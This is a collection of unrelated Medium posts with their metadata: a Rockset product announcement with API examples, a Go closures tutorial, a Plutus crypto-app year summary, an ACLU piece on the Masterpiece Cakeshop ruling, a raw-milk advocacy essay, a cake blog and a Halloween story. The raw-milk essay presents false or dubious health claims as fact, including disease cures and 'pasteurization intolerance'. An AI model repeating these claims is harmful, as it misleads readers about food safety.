Can be tedious — to take advantage of the bells and whistles of our SQL Editor, you have to take the SQL out of the application code, unescape / fill parameters as needed, put it into the SQL editor, iterate, reverse the process to get back into your application and try again. As someone who has built several applications and dashboards backed by Rockset, I know how painful this can be :D Query metrics: Without custom implementation work application-side, there’s no way to understand how a particular query is or is not performing. Each execution, from Rockset’s perspective, is entirely independent of every other execution, and so no stats are aggregated, no alerts or warnings configurable, and any visibility into such topics must be implemented as part of the application itself.
Application / Dashboard Development on Rockset with Query Lambdas
Query Lambdas are named parameterized SQL queries stored in Rockset that can be executed from a dedicated REST endpoint. With Query Lambdas, you can:
version-control your queries so that developers can collaborate easily with their data teams and iterate faster
avoid querying with raw SQL directly from application code and avoid SQL injection security risks by hitting Query Lambda REST endpoints directly, with query parameters automatically turned into REST parameters
write a SQL query, include parameters, create a Query Lambda and simply share a link with another application developer
see which queries are being used by production applications and ensure that all updates are handled elegantly
organize your queries by workspace similarly to the way you organize your collections
create / update / delete Query Lambdas through a REST API for easy integration in CI / CD pipelines
Using the same example as above, the new workflow (using Query Lambdas) looks more like this:
Step 1: Construct SQL query in the Console, using parameters now natively supported
Step 2: Create a Query Lambda
Step 3: Use Rockset’s SDKs or the REST API to trigger executions of that Query Lambda in your app
Example using Rockset’s Python client library:
from rockset import Client, ParamDict

rs = Client()

qlambda = rs.QueryLambda.retrieve(
    'myQueryLambda',
    version=1,
    workspace='commons')

params = ParamDict()
params['days'] = 5
params['userId'] = '...@rockset.com'

results = qlambda.execute(parameters=params)
Example using REST API directly (using Python’s requests library):
import json
import requests

payload = json.loads('''{
    "parameters": [
        { "name": "userId", "value": "..." },
        { "name": "days", "value": "5" }
    ]
}''')

r = requests.post(
    'https://api.rs2.usw2.rockset.com/v1/orgs/self/ws/commons/queries/{queryName}/versions/1',
    json=payload,
    headers={'Authorization': 'ApiKey ...'}
)
Let’s look back at each of the shortcomings of the ‘Status Quo’ workflow and see how Query Lambdas address them:
Raw SQL in application code: Raw SQL no longer ever needs to live in application code. No temptation to string interpolate, just a unique identifier (query name and version) and a list of parameters if needed that unambiguously resolve to the saved SQL. Each execution will always fetch fresh results — no caching or staleness to worry about.
Raw SQL no longer ever needs to live in application code. No temptation to string interpolate, just a unique identifier (query name and version) and a list of parameters if needed that unambiguously resolve to the saved SQL. Each execution will always fetch fresh results — no caching or staleness to worry about. Managing the SQL development / application development lifecycle: With Query Lambdas, a SQL developer can write the query, include parameters, create a Query Lambda and simply share a link (or even less — the name of the Query Lambda alone will suffice to use the REST API) with an application developer. Database administrators can see for each collection any Query Lambda versions that use that collection and thus ensure that all applications are updated to newer versions before deleting any underlying data.
With Query Lambdas, a SQL developer can write the query, include parameters, create a Query Lambda and simply share a link (or even less — the name of the Query Lambda alone will suffice to use the REST API) with an application developer. Database administrators can see for each collection any Query Lambda versions that use that collection and thus ensure that all applications are updated to newer versions before deleting any underlying data. Query iteration in application code: Query iteration and application iteration can be entirely separated. Since each Query Lambda version is immutable (you cannot update its SQL or parameters without also incrementing its version), application functionality will remain constant even as the Query Lambda is updated and tested in staging environments. To switch to a newer or older version, simply increment or decrement the version number in your application code.
Query iteration and application iteration can be entirely separated. Since each Query Lambda version is immutable (you cannot update its SQL or parameters without also incrementing its version), application functionality will remain constant even as the Query Lambda is updated and tested in staging environments. To switch to a newer or older version, simply increment or decrement the version number in your application code. Query metrics: Since each Query Lambda version has its own API endpoint, Rockset will now automatically maintain certain statistics and metrics for you. To start with, we’re exposing for every version: Last Queried (time), Last Queried (user), Last Error (time), Last Error (error message). More to come soon!
Summary
We’re incredibly excited to announce this feature. This initial release is just the beginning — stay tuned for future Query Lambda related features such as automated execution and alerting, advanced monitoring and reporting, and even referencing Query Lambdas in SQL queries.
As part of this release, we’ve also added a new Query Editor UI, new REST API endpoints and updated SDK clients for all of the languages we support. Happy hacking!
Anything more you’d like to see from us? Send us your thoughts at product[at][rockset.com] | https://medium.com/rocksetcloud/query-lambdas-increasing-developer-velocity-for-application-development-314a09a69a9e | ['Scott Morris'] | 2020-03-28 20:59:42.014000+00:00 | ['Sql', 'Application Development', 'Lambda', 'Database', 'Developer'] |
Programming Techniques in Go: Closures | The Go gopher was designed by Renee French. (http://reneefrench.blogspot.com/)
gopher.{ai,svg,png} was created by Takuya Ueda (https://twitter.com/tenntenn). Licensed under the Creative Commons 3.0 Attributions license.
This is the first article in a series about basic programming techniques as illustrated in Go. Recently I was explaining closures to a colleague who was a recent CS grad. They were not really clear on closures in general. It occurred to me that for folks who work mostly in object-oriented languages, some functional techniques may not be super clear, and I figured some articles about them could help. In addition, I struggled to define a closure precisely without examples, and I wanted to be able to do that. Recently I watched a talk by Bill Kennedy, and his precision of language really stood out to me.
As I considered writing about some of the fundamentals of our trade, I started thinking about basic programming concepts like the composable parts of language. In linguistics, a morpheme is the smallest part of language that has inherent meaning. In English an example is the suffix “able”, meaning “capable of.” We all use morphemes all the time. We even know how to make up new words using these existing components, but we may not know how to precisely describe what we are doing. I knew how to write a closure, but it was difficult for me to explain it well.
Closures are a means of lexical scoping and abstraction in languages where functions are first-class values. That sounds more complex than it really is. Let’s look at an example.
Closure Example
Before I jump in I want to make it clear that we could totally do this using a struct that has a field instead. As with most problems, there are multiple solutions, and each has its benefits and risks. This post isn’t really about the benefits of functional programming so I won’t go into that here, but there is some good information available.¹ ² In fact, closures are probably not the best way to write our client, but I will leave that as an exercise for the reader to determine.
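The embedded gist for this example did not survive extraction, so here is a minimal sketch of the client closure described next. The name NewClient and the request-formatting body are my assumptions, not the article's original code:

```go
package main

import "fmt"

// client is the internal struct the article mentions; callers never see it.
type client struct {
	url string
}

// NewClient builds the hidden client and returns a function that has
// "closed over" it. The only way to use the client is through that function.
func NewClient(url string) func(path string) string {
	c := &client{url: url} // captured by the closure below
	return func(path string) string {
		return fmt.Sprintf("GET %s%s", c.url, path)
	}
}

func main() {
	get := NewClient("https://api.example.com")
	fmt.Println(get("/users"))
}
```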
In our example, we have a client: a client that needs to be initialized with a URL. We use our closure to create the client and “close” around it. Internally we are creating a client struct, but it’s hidden from the caller. This is kind of a weird example, so let’s look at a great example in Go.
In this example, we are creating a server. We have a closure in the function AccessLogger. This is a super common pattern in Go. We close around the logger and return a HandlerFunc. That way we can pass the server a standard handler while still having access to our logger, or whatever else you want to pass.
So essentially, a closure is a function that returns another function and gives that inner function access to some variable from the enclosing scope. The inner function keeps that access for its whole lifetime, and as long as nothing reassigns the captured variable, you don’t have to worry about it changing!
That’s about it. I like closures a lot. I think they are elegant and fun to use. I would love to hear what you think or if you have any suggestions for additional topics. | https://medium.com/@guygrigsby/programmingtechniques-in-go-closures-d6cea313d14 | ['Guy J Grigsby'] | 2021-09-14 13:53:42.466000+00:00 | ['Lambda', 'Programming', 'Closure', 'Go', 'Functional Programming'] |
Plutus — 2020 End of Year Summary | Another year in crypto and we have witnessed unprecedented ATHs of Bitcoin, another halving, and institutional acceptance that many have predicted from the early cypherpunk days of Bitcoin. These are exciting times for all involved and we are proud to be part of the biggest financial revolution of the decade (and century) alongside early adopters and new risk-averse users discovering the technology.
Whether you have recently heard of Plutus or are one of our community veterans, here is an overview of 2020.
What Has Plutus Accomplished in 2020?
1) Growth
Awareness
We have seen a huge uptick in awareness of the Plutus app, something that has snowballed over the year due to the organic nature of our marketing. This year, the number of website impressions in Q4 has increased by 749% compared to the year prior. Likewise, clicks have increased by 1,160% and some of our tight-knit community channels have jumped more than 10-fold.
User Base
Whilst Bitcoin climbed meteoric amounts in value from sub $5k up to new ATHs of $28,000+, the team has seen similar growth to our user base. Over 26,000 Plutus Accounts have now been created, which is slightly higher than our forecasts shared in our roadmap. We expect to see this rise to 150,000 users by the end of next year, each using the app for everyday payments and the benefits of its native rewards token, Pluton (PLU).
2) Product
PlutusDEX On Mobile
It is easy to overlook the significance of this.
Typically, DEXs facilitate crypto-crypto transactions, and these exchanges are very rarely seen on mobile due to technical challenges.
Plutus has built potentially the first crypto-fiat DEX and integrated this into our mobile app so users can swap assets on-the-go.
As a result, over $2.75m in value has passed through the DEX, enabling seamless in-store or online payments utilising crypto.
Full Blog >
Pluton Rewards
This year, Pluton Rewards became a reality and Premium/Pro members have been earning 3% in crypto on every single Plutus Card purchase.
Users quickly acquired over $100,000 worth of rewards since its arrival, all without obligatory staking. The majority of our users save significantly more in rewards than the incurred monthly subscription fee for a Premium account now priced at £/€ 9.99 per month.
There are a total of 20m PLU, out of which 1.85m Pluton reward tokens have already come into circulation, and the remaining tokens are locked away only to be distributed to Plutus Card users via our 3% crypto rewards feature over many decades.
See how much you can earn?
Plutus Perks
In order to deliver more value to holders of our rewards token, we released Plutus Perks; a feature that offers additional rewards in both cash and crypto (up to 15%) to those who optionally stake PLU.
We now offer huge earnings at universally popular brands such as Amazon, Apple, Sky, Nike, and more. This is another step towards increasing the utility of PLU.
This programme has evolved over the year with the introduction of External Staking in a non-custodial manner, another rarely seen and innovative addition to Plutus’ feature set.
Full Perks Breakdown >
3) Operational
Pluton Liquidity Injection Programme (PLIP)
One of the biggest priorities of 2020 was increasing awareness of the Plutus app and accessibility of our native rewards token, Pluton (PLU). In September, we launched the Pluton Liquidity Injection Programme (PLIP), a plan approved by our community that involved numerous exchange listings and the reallocation of PLU.
PlutusDEX Sale
This commenced with a sale event on our own internal PlutusDEX where 100,000 PLU was pledged by the general public and community members. This was oversubscribed within 48 hours and extended to accommodate the demand, whereupon it was oversubscribed a second time before concluding.
Full Blog >
Listings
At the start of this year, PLU was not available on any Tier 1 exchanges as the concept for our decentralised loyalty rewards system was still in development. Since its release, PLU has arrived on Bitfinex, BitMax, KuCoin, and several other well-known exchanges, making it far more accessible for people to obtain and use for its in-app benefits.
What’s to Come in 2021?
Pluton Liquidity Injection Programme (PLIP)
Although PLIP is set to conclude on Jan 11th once the minimum PLU price-floor is lifted, our awareness campaign will continue. We have several more exciting Tier 1 listings, partnerships, and co-branding plans in the pipeline.
We have also successfully increased the token utility in 2020 by providing multiple money-saving features for those that stake PLU. Making PLU readily available across both internal and external markets is an important progression for the product, something which is still underway.
Prior to PLIP, the monthly conversion limit of PLU was set at £/€ 200. Since then, it has risen to £/€ 700 per month, and the daily limit set at £/€ 30 to enable everyday purchases. We will continue to evaluate and raise both these limits in the new year as the transaction frequency grows in parallel to our user base.
Expanding Internationally
Plutus has established a strong foothold in the UK/EEA market and we plan to rapidly expand our user-base within these regions. We will also be breaking into Asia and Latin America where we have seen considerable interest.
Banking License Pursuit
Obtaining a banking license and overcoming the multitude of legal red tape is a lengthy process, and Plutus has already commenced with the first steps. 2021 will involve jumping through numerous challenging hoops before reaching our long-term goal of becoming a non-custodial crypto bank the following year.
Plutus 3.0
Plutus has never been shy of delivering world-first features, and next year you can look forward to plenty of exciting ones! Here is what we plan to deliver in the first few months of 2021:
Product Features
An iteration of our current app but with a more streamlined UX and a design overhaul to support new features.
Bitcoin-Fiat DEX
Whilst ERC-20 DEXs are commonplace, Bitcoin integration would be another rare feature to become available to all Plutus members on both the web and mobile app. Although originally planned for December, the highly anticipated Bitcoin-Fiat DEX will now be arriving in Q1.
Plutus Wallet Extension
We will be releasing our very own wallet extension. Think of this as Plutus’ very own MetaMask but with the addition of Bitcoin.
Altcoin Accessibility
Alternative blockchains other than Bitcoin and Ethereum will be connectable to the Plutus Card.
PlutusDEX Pool & Earn
Staying true to the original concept of the Plutus white paper, the PlutusDEX will enable our members to pool together to become liquidity providers and earn a percentage back in rewards. | https://medium.com/plutus/plutus-2020-end-of-year-summary-97ca7e49dd49 | [] | 2020-12-30 09:53:54.252000+00:00 | ['Ethereum', 'Bitcoin', 'Cryptocurrency', 'Fintech', 'Announcements'] |
In Masterpiece, the Bakery Wins the Battle but Loses the War | In Masterpiece, the Bakery Wins the Battle but Loses the War
The court narrowly ruled for the bakery, but reaffirmed states can bar businesses from discriminating against LGBT people.
By James Esseks, Director, ACLU Lesbian Gay Bisexual Transgender & HIV Project
JUNE 4, 2018 | 4:15 PM
In the Masterpiece Cakeshop case, the Supreme Court today ruled for a bakery that had refused to sell a wedding cake to a same-sex couple. It did so on grounds that are specific to this particular case and will have little to no applicability to future cases. The opinion is full of reaffirmations of our country’s longstanding rule that states can bar businesses that are open to the public from turning customers away because of who they are.
The case involves Dave Mullins and Charlie Craig, a same-sex couple who went to the Masterpiece Cakeshop in Denver in search of a cake for their wedding reception. When the bakery refused to sell Dave and Charlie a wedding cake because they’re gay, the couple sued under Colorado’s longstanding nondiscrimination law. The bakery claimed that the Constitution’s protections of free speech and freedom of religion gave it the right to discriminate and to override the state’s civil rights law. The Colorado Civil Rights Commission ruled against the bakery, and a state appeals court upheld its decision.
In reversing the lower court’s ruling, the Supreme Court focused on how this particular case was handled by the commission, which decides cases under Colorado’s nondiscrimination law. The court detailed concerns about comments from some of the Colorado commissioners that they believed revealed anti-religion bias. Because of that bias, the court held that the bakery wasn’t treated fairly when the commission decided the discrimination claim.
But — despite arguments from the Trump administration and other opponents of LGBT equality — the court didn’t decide that any business has a right to discriminate against customers because of who they are. Instead, the court’s decision affirms again and again that our nation’s laws against discrimination are essential to maintaining America’s open society and that states can pass and enforce those laws, including in the context of LGBT people.
First, the court reaffirmed that lesbian, gay, and bisexual people are entitled to equal dignity. The ruling makes clear that it “is unexceptional that Colorado law can protect gay persons, just as it can protect other classes of individuals, in acquiring whatever products and services they choose on the same terms and conditions as are offered to other members of the public.” The decision continues:
“Our society has come to the recognition that gay persons and gay couples cannot be treated as social outcasts or as inferior in dignity and worth. For that reason the laws and the Constitution can, and in some instances must, protect them in the exercise of their civil rights. The exercise of their freedom on terms equal to others must be given great weight and respect by the courts.”
The court also reaffirmed its longstanding rule that states can prevent the harms of discrimination. It noted that while the “religious and philosophical objections” of business owners:
“are protected, it is a general rule that such objections do not allow business owners and other actors in the economy and in society to deny protected persons equal access to goods and services under a neutral and generally applicable public accommodations law.”
The court further recognized the danger of free speech and freedom of religion claims that the bakery advanced in this case, stating that:
“any decision in favor of the baker would have to be sufficiently constrained, lest all purveyors of goods and services who object to gay marriages for moral and religious reasons in effect be allowed to put up signs saying ‘no goods or services will be sold if they will be used for gay marriages,’ something that would impose a serious stigma on gay persons.”
The decision also recognizes that adopting a rule — as advocated by the bakery — that would allow businesses to turn gay people away carries a significant risk of harm. It outlines its own fear that “a long list of persons who provide goods and services for marriages and weddings might refuse to do so for gay persons.” This would result, the decision continues, “in a community-wide stigma inconsistent with the history and dynamics of civil rights laws that ensure equal access to goods, services, and public accommodations.”
Significantly, the court cited an earlier case, Newman v. Piggie Park Enterprises, Inc., where it rejected precisely the kind of claims that the bakery made here. Piggie Park was a chain of barbeque restaurants in Columbia, South Carolina, that claimed its religion required it to refuse to serve Black customers alongside white ones and that applying the 1964 Civil Rights Act would violate its religious freedom. The courts rejected that argument, with the Supreme Court calling it “frivolous.”
The court today ruled for the bakery because it “was entitled to the neutral and respectful consideration of [its] claims in all the circumstances of the case,” and the justices in the majority believed the bakery didn’t receive that basic fairness. The court reminded us that “these disputes must be resolved with tolerance, without undue disrespect to sincere religious beliefs, and without subjecting gay persons to indignities when they seek goods and services in an open market.”
All of us deserve a dispassionate evaluation of our claims, either when we face discrimination or are accused of it. Those are principles we can all agree on.
Today’s decision gives a very narrow win to the bakery. But the court has clearly signaled that the broader rule the bakery was seeking here — a constitutional right to discriminate and turn customers away because of who they are — is not in keeping with American constitutional tradition.
There are many other cases in the pipeline that may soon give the court the opportunities to sort through the legal issues at the center of the Masterpiece Cakeshop case. One is Ingersoll v. Arlene’s Flowers, in which a florist shop refused to sell flowers to a gay couple for their wedding. The Washington state Supreme Court ruled unanimously that the shop had no constitutional right to turn the couple away, and a petition for review by the U.S. Supreme Court remains pending.
In the meantime, Congress should pass the Equality Act, which would update our civil rights laws to provide all people with full protection from discrimination. Here at the ACLU, we will continue working to ensure that the Supreme Court strikes the right balance between equality and the freedoms of speech and religion. In today’s decision, the court reaffirmed that the latter should not be used to undermine the former. | https://medium.com/aclu/in-masterpiece-the-bakery-wins-the-battle-but-loses-the-war-d0cbe7f79508 | ['Aclu National'] | 2018-06-04 20:32:21.007000+00:00 | ['Religion', 'LGBTQ', 'LGBT Rights', 'Speak Freely', 'Supreme Court'] |
Don’t kill the milk: The raw story behind real milk | Don’t kill the milk: The raw story behind real milk
This great image by DodgertonSkillhause
Traditional foods have health maintenance properties, and in some cases they actually have healing properties. Milk is one of these foods; however, there is a sort of milk madness going around — constant controversy over our dietary rights concerning this source of nutrition.
It’s distressing and slightly terrifying that we live in a world where the food we eat — the most basic human necessity — is being controlled by a certain few commercial entities. Some of whom now hold legal patents on everything from food crops to hormones.
No matter what your political or religious inclinations are, we should all be able to agree that we do not own the Earth.
We inhabit this planet, we did not create it, and by now we should have learned that we cannot perfect what nature provides. Furthermore, no singular entity should have the right to purchase, or claim entirely for itself, “products” that nature has made. To make it very simple, the Earth should be recognized as a free, emancipated, liberated and unbound entity which holds the “patents” on her own creations.
Nature gives us sustenance free of charge — the Earth comes equipped with everything that all life forms need to survive, and as a sweet bonus our natural foods come with built-in healing properties to ensure that we don’t just survive, we thrive.
Food is not a privilege; it is a rightful endowment — a fair allowance for every living creature. Our food choices should be a non-issue, like breathing the air or drinking the water.
In our lifetime however, our fundamental right of food choice is being taken from us. Countless natural foods have become extinct due to modern development and agricultural practices, and most other basic foods have been modified, hybridized, artificialized, homogenized and pasteurized to a point of alienation from our body’s natural digestive process. In essence we are being robbed of what is rightfully ours — the choice of what foods to fuel and heal our bodies with.
Fresh Goat’s Milk (Image by Tauna Pierce)
Milk is one of the natural food items that we are being cheated out of. Government and commercial units are becoming more and more aggressive in their attempt to deprive us of clean, pure, raw milk from healthy, naturally grazed animals. In most states it is illegal for a dairy farmer to sell fresh, unadulterated, naturally occurring raw milk to consumers for their consumption.
Raw milk is a whole food
A “whole food” is an unaltered, unprocessed, unrefined naturally occurring traditional food with no added salts, preservatives, colorings — and certainly no chemical additives. It’s the stuff that is supposed to feed our bodies. Whole foods are full of essential proteins, vitamins and minerals, and in most cases provide immune system support and other healing properties in addition to basic nutrition. Milk, in its raw form is exactly this. It’s the very first food every mammal receives nourishment from, and humans throughout the entirety of our history have flourished on the life-giving milk of virtually any mammal that would let us have it, including goats, cattle, elk, camels, donkeys, horses, reindeer, sheep, water buffalo, yak and even seals.
Some anti-milk advocates say that it’s unnatural to drink another mammal’s milk. They claim that humans are the only species that consumes milk after we’ve been weaned from our mothers. That logic doesn’t hold ground with me. We eat the meat of other animals, the eggs of other animals, and even the blood of other animals. We also use various parts of other animals in our medicines, our vaccines and our beauty products. So what makes the milk off limits? Most non-ruminant carnivorous mammals WILL drink milk if given the chance; they just lack the thumbs to get it out of another lactating animal. Canines, felines and rodents are among these, just to name a few.
Raw milk is medicine
Local Dairy Farm (Image by Tauna Pierce)
Milk has a bit of hidden magic in it: more than just a drink, milk is medicine. Many cultures throughout history have used raw milk to treat various diseases. The Mayo Foundation used a diet of organic raw milk from grass-fed animals as medicine in the 1920’s. Even way back then it was already a proven remedy for heart failure, diabetes, kidney disease, chronic fatigue and obesity.
Dr. J.R. Crewe, MD in 1929 said “The experience of seeing many cases of illness improve rapidly on a diet of raw milk has suggested that much of modern disease is due to an increasing departure from simple methods of preparing plain foods.”
Over a period of 18 years, Dr. Crewe had great success treating a multitude of illnesses with raw milk and wrote that “practically all medical men are agreed as to the value of milk as a food, and as an important part of the diet in the treatment of many diseases”.
The main difference between Dr. Crewe’s time and today boils down, in my opinion, to politics and accountability. In those days there was no pasteurization and no monopolistic megafarms eating up all the small-scale local dairy farms (the largest dairy farms in the U.S. today house over 15,000 cows). Reputation itself was the key to surviving in hometown business — dairy or otherwise. If you were a farmer with a cow, and you wanted to sell your milk to the community, you’d best be sure that the pasture was clean, the cow was healthy, the milk was wholesome and collection methods were sanitary. This provided milk that did more than quench your thirst, it was one of Nature’s best remedies, and a growing number of today’s physicians are returning to that way of thinking. Many are actively involved in the raw milk movement and steer their patients away from pasteurized milk.
Image via MorgueFile
Raw milk is not pasteurized
Pasteurization is the process of heating milk to sterilize it, to kill any bacterium that could cause illness to humans. Unfortunately this sterilization technique is an indiscriminate killer and also renders dead the good bacteria needed for digestion and most of the nutritive value. Pasteurization is the murder of all the living things that make milk milk. To put it simply, pasteurized milk is dead milk — it has been sanitized to death.
The irony of this whole process is that milk, from a healthy, naturally grazed cow (or goat, or any other mammal for that matter) doesn’t contain harmful bacteria; quite the opposite, it is a colloidal compound of many living beneficial organisms. The harmful bacterial diseases that the industry is so concerned about protecting us from come from secondary contamination — from unhealthy cows raised, fed, treated and milked in over-populated and unsanitary conditions. Pasteurization is a license for commercial dairy factories to raise animals in inhumane conditions, use dirty collection methods and produce poor quality milk — pasteurization cleans up and hides their ugly manure stained mess.
Funny thing is, pasteurization wipes out any bacterial evidence of dirty conditions, but it doesn’t kill the chemical cocktails that have been added to the cows that are producing the milk.
A recent study published in the Journal of Agricultural and Food Chemistry confirmed that an average glass of pasteurized milk bought from the grocery store can contain traces of anti-inflammatory drugs, steroids, antibiotics, and various painkillers. Not to mention the residues of pesticides, larvicides, fertilizers, heavy metals, GM food crops and artificial growth hormones — all of which continue to show strong potential for being human carcinogens.
Image by sable2327
Raw milk is not homogenized
Homogenization bursts the fat cells, making them smaller and able to blend in with the rest of the milk. Some of you remember in the “old days” you had to shake the milk to mix it before drinking. The process of destroying this nutritious butter fat is not necessary, nor is it required, although it does prevent consumers from using the cream to make their own butter and cheeses. This is very convenient to the commercial dairy industry that also sells butter, cheese and other dairy products.
Raw milk is illegal
According to the Centers for Disease Control and Prevention, milk is unsafe to drink in its naturally occurring state. They, along with the FDA, USDA and the commercial dairy industry (the largest of these conglomerates showed a net income of $40.2 million for 2011) claim to be looking out for our health and wellbeing by trying to eradicate the possibility of the sale of raw milk from the small scale farmer directly to the consumer.
To be fair, we must look at the CDC’s numbers. According to their website, approximately 800 people in the United States have gotten sick from drinking raw milk or eating cheese made from raw milk — since 1998. The Weston A. Price Foundation breaks those numbers down a little more: “An average of 112 illnesses each year were attributed to all raw dairy products, and 203 were attributed to pasteurized dairy products.”
To add a little context, about 24,000 food borne illnesses are reported each year, making only one half of one percent of these issues being attributed to raw milk and other raw dairy products combined.
The Alliance for Natural Health points out that in the 38 years data has been collected, there has not been one single death from consuming raw milk — compared to more than 80 deaths from pasteurized milk products during that same time frame.
In fact, the Center for Science in the Public Interest shows that raw milk isn’t even listed as one of the “Riskiest Foods Regulated by the FDA”. Leafy greens are far more apt to make you sick — an astounding 13,568 people became ill from lettuce, kale, spinach and cabbage during this particular study. So why isn’t it illegal to sell, purchase or consume a commercially processed salad? For a mere $4 you can get a McSalad handed to you without even getting out of your car — without a license, permit or age requirement.
For that matter, also according to CDC data, it is estimated that 450,000 preventable medication-related illnesses occur each year in the U.S. — with approximately 100,000 deaths each year from “proper” use of prescription drugs. And those who peddle these drugs are allowed to do so, legally, but a farmer cannot sell delicious life-supporting raw milk from a healthy, humanely raised cow to a neighbor who simply seeks natural foods for himself.
Via MorgueFile by stuartjessop
The outlaw status of raw milk is perplexing. Even more bewildering are the food products that are legal to sell for human consumption: “processed” foods, genetically modified foods, fast food in every combination, soft drinks, energy drinks, artificial sweeteners, preservatives, synthetic flavors and colorings — all of which have shown time and time again to cause everything from obesity to diabetes to heart disease and cancers of every flavor. These foods can be purchased by anyone anywhere with no legal ramifications. But my favorite local farmer cannot sell his cow’s milk to me.
Aside from protecting us from the very minute possibility of becoming sick from contaminated raw milk, there’s also the ‘lactose intolerance’ propaganda to weed through. It is estimated that up to 50 million Americans are lactose intolerant. This is an interesting slant — technically, however, we are pasteurization intolerant. Milk (in its natural state) comes equipped with the enzymes it takes to digest itself! These are wiped out in the pasteurization process; therefore, in my opinion, the above statistic shows that 50 million American bodies reject processed, pasteurized and homogenized milk.
It just doesn’t add up. What does add up, however, is the insane amount of profit that certain corporations make off of the manufacturing process of pasteurized milk and dairy products.
Milk is profit
This image borrowed from http://www.sodahead.com
So who has what to gain by controlling milk for the masses? Who is profiting off of all this milk madness? Well, it’s certainly not Mother Nature who provides the cows, and it’s not the cows who provide the milk, and believe it or not, it’s not even the farmer in most cases. Turns out there are only a very few companies who monopolize the market when it comes to selling to the dairy farmer what he “needs” — things like livestock feed, livestock vaccine, antibiotics, bovine growth hormones as well as modified plant seeds and the pesticides that trigger their growth.
Monsanto’s website boasts that “millions of tons of GM crops have been fed to farm animals for more than a decade.”
So Monsanto rears its ugly head again. This chemical company, and a handful of other chemical manufacturers, is quickly taking over ownership of nearly our entire food supply. They are controlling our seeds (our food), our pharmaceuticals (our healthcare), our pesticides (our health problems) and yes, they also have their dirty hands in our milk.
According to USDA information, in the years between 1970 and 2006 commercially produced milk production doubled — from an average of 9,751 lbs per year (per cow) to 19,951 lbs per year (per cow).
Adding artificial hormones to commercial dairy cows had everything in the world to do with this drastic change — Monsanto developed recombinant bovine growth hormone (rBGH) during this timeframe. This synthetic hormone and its potential health risks are extremely controversial, due in part to it being produced through a genetically engineered E.coli.
This rBGH (trade name Posilac) has never been tested on humans — unless you count the unofficial “studies” that are being conducted today on the unsuspecting American public. Monsanto claims that testing the side effects of their artificial hormones is unnecessary. “Aspects of the GM crop which are the same as the non-GM counterpart do not require safety assessment” because the natural product and the GM product are “substantially equivalent” and “there is simply no practical way to learn anything via human studies of whole foods. This is why no existing food — conventional or GM — or food ingredient/additive has been subjected to this type of testing.”
So, following this particular rationale, shouldn’t raw milk also be “substantially equivalent” to pasteurized milk and thus be legal for consumption? Or for that matter, we should suppose that a rattlesnake is “substantially equivalent” to a rat snake and therefore be considered quite safe.
It’s important to note, that this same company, which plays a part in determining that milk from cows containing their chemicals is safe to consume, also manufactured Agent Orange, DDT, PCBs and dioxin. It’s also worth mentioning that Posilac has been banned from use (since 2000) in at least 27 countries including Canada, Japan and the entire European Union.
by MichelleBulgaria
Milk in summary — pasteurized VS pasture-ized
Raw milk = beneficial bacteria, helpful enzymes, proteins/amino acids, immune support, every known fat and water soluble vitamin, 20+ minerals, the ability to absorb calcium and vitamin D, complete nutrition, defense against diseases, the potential to cure certain allergies and illnesses — from cows that are more apt to be raised, fed and treated in healthy, humane conditions on the appropriate diet, by farmers who uphold an old fashioned idea of general accountability — and generally welcome you to visit their farm and meet the cows that will provide your milk.
Pasteurized milk = dead bacteria, dead enzymes, no phosphatase (which is essential for absorbing calcium), genetically engineered hormones, GM food fallout, traces of heavy metals, antibiotics and other synthetic pharmaceuticals, allergic reactions, lactose intolerance, and mounting evidence that shows an increase in health disorders (including arthritis, cardiovascular problems, diabetes, weight gain, asthma, etc.) — from megafarms where cows are kept in overcrowded, unhealthy conditions, kept away from their natural foods, fed synthetic feed, pumped full of artificial hormones, antibiotics and other drugs — and are kept conveniently out of the public view.
Although the sale of raw milk for human consumption is outlawed in most states, you can purchase raw milk from many small scale dairy farms for your pets to enjoy. For a list of raw milk suppliers in your area, visit http://www.realmilk.com. | https://medium.com/driftwood-chronicle/dont-kill-the-milk-the-raw-story-behind-real-milk-cd20ab038b17 | ['Tauna Pierce'] | 2016-11-18 14:03:58.774000+00:00 | ['Environmental Issues', 'Raw Milk', 'Local Food', 'Politics', 'Making A Difference'] |
‘Cake Is Life’ | ‘Cake Is Life’
I wish that cake was in front of me right now but it isn’t.
A box or two of Duncan Hines cake mix and container of completely oil-based icing always have a spot in my pantry…just in case a cake craving hits.
Birthday cake and vanilla ice cream together is one of my most favourite things to eat ever (close if not the same as cinnamon buns and popcorn).
For obvious reasons and even though part of me would like to, I don’t have one made at all times. Between Jeff and I (and I would throw my sister-in-law Amy in there if she lived with us) the entirety of the cake would probably be made and eaten every day.
One thing that I think is possibly a women-only phenomenon is eating cake and dessert in tiny slices…just to have that one more taste…until the whole piece or item is gone. True? False? (I’m ‘guilty’!)
While I would personally place pies in this category too as they are round and all, I’ll leave cakes on their own for now:
Besides birthday cake and ice cream — any type of cheesecake, DQ ice cream cake, Nana’s coffee cake, Swiss P’s raspberry torte, any kind of chocolate cake, angel food cake with whipped cream and strawberries, my mother-in-laws orange/chocolate pudding layer cake and Costco’s Tuxedo cake are desserts I hope to enjoy at least a few times each every year.
There isn’t always a reason or special occasion needed and after looking at this photo and writing about it…I think I’ll bake up one of those boxed cakes.
Why? Um, because it’s Thursday and cake is life.
What are your favs?
-Becky | https://medium.com/@beckyboughton/cake-is-life-aea31f44fbe8 | ['Becky Boughton'] | 2020-11-13 03:23:48.997000+00:00 | ['Cake', 'Baking', 'Life', 'Dessert', 'Cooking'] |
1981 Halloween | “Come on now, single file please!” the bus driver commandingly down the aisle. We’re heading off to the Halloween party at Mrs. Meyers house, and everybody was excited. Mrs. Meyer always throws the best parties. I hope she has the costume parade like last year. That was a blast! Speaking of which, I crane my neck to see all the costumes. There’s a witch, a pirate, and even Yoda! I look down at my costume, which is as basic as it can be, a ghost. We couldn’t afford any special ones, so my mother took a white bed sheet and cut holes for my eyes, mouth, and nose.
While I wait for the bus to start, I try to find Jeremy, my best friend. He always brings the best treats, and his house gives out the best candy during trick-or-treat. Caramello, bubble gum, and even toffee-filled lollipops! Man, those were so good! I quickly find Jeremy in his superhero costume. “How’s it going?” I ask, plopping onto the seat next to him. “Hey Will! Yeah, it’s been good. My mom got the candy from downtown, and it’s goin’ to be epic!” Jeremy responds, stretching out in the seat. “Groovy,” I respond, tugging on a corner of my costume. “We’re leaving in 5 minutes folks, make sure you have a seat!” I hear the bus driver say, so loud that my eardrums pop! “Get ready, Will,” Jeremy says, his eyes gleaming. “Why?” I ask, wondering what he was talking about. “It’s going to be a long ride,” he responds, speaking in a way that I knew meant he was up to something. “OK kiddos, we’re moving, so get your butt in a seat!” the bus driver says loudly, interrupting my train of thought. And with that, the bus begins to move, and I brace myself for the crazy ride.
